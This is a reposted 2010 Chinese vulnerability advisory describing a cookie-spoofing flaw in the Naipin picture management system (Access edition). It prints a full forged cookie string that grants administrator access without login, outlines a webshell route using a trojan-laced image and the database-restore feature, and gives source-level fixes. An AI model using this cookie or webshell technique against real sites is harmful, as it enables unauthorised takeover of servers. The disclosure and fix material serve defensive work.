• 欢迎访问搞代码网站,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站!
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏搞代码吧

耐品图片管理系统Access版Cookie欺骗漏洞

mysql 搞代码 4年前 (2022-01-09) 29次浏览 已收录 0个评论

发布日期:2010-10.08 发布作者:redice 影响版本:20100906 Access版 官方地址:http://www.naipin.com/ 漏洞 类型:Cookie 欺骗 漏洞 描述:大概一年前我发现了《耐品 图片 管理 系统 Access版》有Cookie 欺骗 漏洞 :任意用户可以通过修改Cookie拿到 管理

发布日期:2010-10.08
发布作者:redice

影响版本:20100906 Access版
官方地址:http://www.naipin.com/

漏洞类型:Cookie欺骗
漏洞描述:大概一年前我发现了《耐品图片管理系统Access版》有Cookie欺骗漏洞:任意用户可以通过修改Cookie拿到管理员权限。

今年6月份我

本文来源gaodai.ma#com搞##代!^码@网3

给耐品技术发了邮件,告知了这个漏洞,他们回复如下:

”您好,谢谢您的提醒!
祝您合家幸福安康!“

今天我下载了最新版(Naipin_T_20100906_acc.rar)进行了测试,发现这个漏洞仍然存在。
既然官方如此不重视,我就它放出来。

Netpic=ArticleFlag=0&UserName=redice&GroupID=1&Comment=1&Source=0&Article=1&PicFlag=0&Group=%C6%D5%CD%A8%BB%E1%D4%B1&Vote=1&UserId=77&Self=1&View=1&Manage=0&Upload=1&ViewHide=0&Setting=1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1; ASPSESSIONIDCABRBATD=MDCHGDDALJGALHFHOIFLFJLL

利用上面的cookie不登录也能拿到管理员权限…

拿Webshell的一种思路:

如果数据库后缀名是asp的,可以采用该思路。上传用户图像,上传一张含有一句话木马的图片(采用edjpgcom工具)。
进入后台,使用数据库恢复功能将上传的图片恢复为数据库。

修复方案:临时修补办法如下:

(1)Admin_ChkLogin.asp第66行下增加如下代码:
session(“GroupId”)=Rs(“GroupId”)

(2)将clsMain.asp的第112行改为如下代码:
UserGroupId=session(“GroupID”)

(3)建议尽量做到:能写入的目录不给执行权限,能执行的目录不给写入权限。

标签分类: cookie欺骗 验证漏洞


搞代码网(gaodaima.com)提供的所有资源部分来自互联网,如果有侵犯您的版权或其他权益,请说明详细缘由并提供版权或权益证明然后发送到邮箱[email protected],我们会在看到邮件的第一时间内为您处理,或直接联系QQ:872152909。本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:耐品图片管理系统Access版Cookie欺骗漏洞

喜欢 (0)
[搞代码]
分享 (0)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址